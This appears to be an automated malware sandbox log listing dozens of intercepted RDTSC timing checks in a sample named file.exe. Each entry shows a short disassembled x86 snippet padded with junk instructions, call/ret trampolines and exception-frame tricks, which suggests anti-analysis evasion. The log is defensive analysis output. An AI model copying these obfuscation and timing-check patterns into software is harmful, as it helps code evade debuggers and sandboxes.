    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50FF1 second address: A5100D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5100C93C0Ch 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e ja 00007F5100C93C06h 0x00000014 pop eax 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5100D second address: A51014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51014 second address: A5101C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96521 second address: A96526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96526 second address: A9652C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9652C second address: A96530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96774 second address: A96778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96778 second address: A9677E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98654 second address: A986CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5100C93C08h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ebx, 6E8A24B6h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F5100C93C08h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 or dword ptr [ebp+1244B811h], ebx 0x0000004b push 00000000h 0x0000004d and edi, dword ptr [ebp+124662B4h] 0x00000053 push eax 0x00000054 push esi 0x00000055 push eax 0x00000056 push edx 0x00000057 jnl 00007F5100C93C06h 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A987FF second address: A9880B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9880B second address: A9881A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F5100C93C06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A5FB second address: A9A5FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A7A2 second address: A9A82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F5100C93C08h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 sub dword ptr [ebp+122D1B19h], eax 0x0000002e push dword ptr fs:[00000000h] 0x00000035 or bh, 00000020h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f sub dword ptr [ebp+122D380Ah], esi 0x00000045 and edi, 4EA946BBh 0x0000004b mov eax, dword ptr [ebp+122D1769h] 0x00000051 push 00000000h 0x00000053 push edx 0x00000054 call 00007F5100C93C08h 0x00000059 pop edx 0x0000005a mov dword ptr [esp+04h], edx 0x0000005e add dword ptr [esp+04h], 00000017h 0x00000066 inc edx 0x00000067 push edx 0x00000068 ret 0x00000069 pop edx 0x0000006a ret 0x0000006b mov dword ptr [ebp+12456540h], ebx 0x00000071 push FFFFFFFFh 0x00000073 mov ebx, 0DCE9EC1h 0x00000078 mov bh, dh 0x0000007a nop 0x0000007b pushad 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B99E second address: A9B9A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C806 second address: A9C80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A82B second address: A9A83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5100BF03E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E507 second address: A9E511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5100C93C06h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C80C second address: A9C810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A83A second address: A9A84C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F5100C93C06h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A84C second address: A9A852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F4A9 second address: A9F502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, 7E4Eh 0x00000010 push 00000000h 0x00000012 call 00007F5100C93C0Ch 0x00000017 mov dword ptr [ebp+122D1802h], edi 0x0000001d pop edi 0x0000001e movzx ebx, di 0x00000021 push 00000000h 0x00000023 mov ebx, dword ptr [ebp+122D2D22h] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F5100C93C14h 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F502 second address: A9F50D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5100BF03E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E754 second address: A9E759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA04EA second address: AA04F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0594 second address: AA05C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5100C93C14h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F6A3 second address: A9F6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F6A7 second address: A9F6B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F6B0 second address: A9F6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F5100BF03E6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F6C0 second address: A9F6C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F6C4 second address: A9F6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5100BF03EEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0741 second address: AA074B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5100C93C06h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA36DA second address: AA36E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5100BF03F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA36E4 second address: AA36EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA36EA second address: AA3702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jbe 00007F5100BF03E8h 0x0000000d push ebx 0x0000000e jnl 00007F5100BF03E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A400D5 second address: A400E5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5100C93C06h 0x00000008 jnp 00007F5100C93C06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3C80 second address: AA3C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5100BF03E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3C8A second address: AA3D25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F5100C93C08h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 jmp 00007F5100C93C17h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F5100C93C08h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov dword ptr [ebp+1244C8C5h], edi 0x0000004f push 00000000h 0x00000051 or edi, dword ptr [ebp+124571FBh] 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jg 00007F5100C93C0Ch 0x00000060 ja 00007F5100C93C06h 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3D25 second address: AA3D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5100BF03F2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f jc 00007F5100BF03ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4CB1 second address: AA4D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D2FE5h] 0x0000000e push 00000000h 0x00000010 jmp 00007F5100C93C11h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F5100C93C08h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov di, 9ABFh 0x00000035 xchg eax, esi 0x00000036 jp 00007F5100C93C20h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push ecx 0x00000041 pop ecx 0x00000042 pushad 0x00000043 popad 0x00000044 popad 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4D1F second address: AA4D24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA074B second address: AA07D8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5100C93C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub dword ptr [ebp+122D17E7h], edi 0x00000015 jmp 00007F5100C93C0Eh 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov edi, dword ptr [ebp+122D2EAAh] 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e mov dword ptr [ebp+122D337Dh], ecx 0x00000034 mov eax, dword ptr [ebp+122D0EADh] 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007F5100C93C08h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 mov edi, eax 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push edx 0x0000005b call 00007F5100C93C08h 0x00000060 pop edx 0x00000061 mov dword ptr [esp+04h], edx 0x00000065 add dword ptr [esp+04h], 00000018h 0x0000006d inc edx 0x0000006e push edx 0x0000006f ret 0x00000070 pop edx 0x00000071 ret 0x00000072 nop 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA07D8 second address: AA07E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5100BF03E6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6DBB second address: AA6DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA16E4 second address: AA16E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA16E8 second address: AA16EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA16EE second address: AA1767 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5100BF03ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or ebx, dword ptr [ebp+1244B82Ah] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 ja 00007F5100BF03F2h 0x00000027 mov eax, dword ptr [ebp+122D0141h] 0x0000002d call 00007F5100BF03F6h 0x00000032 add dword ptr [ebp+12446BBDh], ebx 0x00000038 pop edi 0x00000039 push FFFFFFFFh 0x0000003b pushad 0x0000003c jp 00007F5100BF03E7h 0x00000042 popad 0x00000043 nop 0x00000044 push edx 0x00000045 jnl 00007F5100BF03E8h 0x0000004b pop edx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 pushad 0x00000051 popad 0x00000052 pop ebx 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3E85 second address: AA3E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4E6F second address: AA4E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b js 00007F5100BF040Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5100BF03EEh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5E71 second address: AA5E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5E75 second address: AA5E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5100BF03EBh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F5100BF03ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5E92 second address: AA5E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6FA4 second address: AA6FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6FA8 second address: AA6FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6FAE second address: AA704A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F5100BF03E8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 add di, E24Dh 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov dword ptr [ebp+1245E42Ch], ecx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push ecx 0x00000040 call 00007F5100BF03E8h 0x00000045 pop ecx 0x00000046 mov dword ptr [esp+04h], ecx 0x0000004a add dword ptr [esp+04h], 00000016h 0x00000052 inc ecx 0x00000053 push ecx 0x00000054 ret 0x00000055 pop ecx 0x00000056 ret 0x00000057 mov dword ptr [ebp+122D2FE5h], eax 0x0000005d mov eax, dword ptr [ebp+122D05BDh] 0x00000063 or dword ptr [ebp+1244CB2Dh], ecx 0x00000069 jc 00007F5100BF03E7h 0x0000006f cld 0x00000070 push FFFFFFFFh 0x00000072 or dword ptr [ebp+122D3ACFh], esi 0x00000078 mov bh, ch 0x0000007a push eax 0x0000007b pushad 0x0000007c push ebx 0x0000007d je 00007F5100BF03E6h 0x00000083 pop ebx 0x00000084 js 00007F5100BF03ECh 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4BF30 second address: A4BF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1A95 second address: AB1A9A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB144D second address: AB1464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100C93C13h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1464 second address: AB1468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1468 second address: AB1489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5100C93C19h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1489 second address: AB14A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5100BF03EFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB14A5 second address: AB14B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F5100C93C06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB14B4 second address: AB14B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB14B8 second address: AB14D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C16h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4B00 second address: AB4B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4B04 second address: AB4B24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jmp 00007F5100C93C12h 0x00000012 pop esi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABBB56 second address: ABBB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100BF03F2h 0x00000009 popad 0x0000000a pushad 0x0000000b jns 00007F5100BF03E6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F483 second address: A4F487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F487 second address: A4F48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F48D second address: A4F4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F5100C93C13h 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAEE3 second address: ABAEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB094 second address: ABB0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100C93C19h 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F5100C93C18h 0x00000010 pop ecx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0CC second address: ABB0EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5100BF03EAh 0x00000012 jbe 00007F5100BF03E6h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0EF second address: ABB0F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0F3 second address: ABB11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5100BF03E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F5100BF03FEh 0x00000012 jmp 00007F5100BF03F8h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB2B4 second address: ABB2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB2BA second address: ABB2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB2BE second address: ABB2C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB440 second address: ABB457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F5100BF0416h 0x0000000e pushad 0x0000000f jg 00007F5100BF03E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB457 second address: ABB472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5100C93C14h 0x0000000c rdtsc
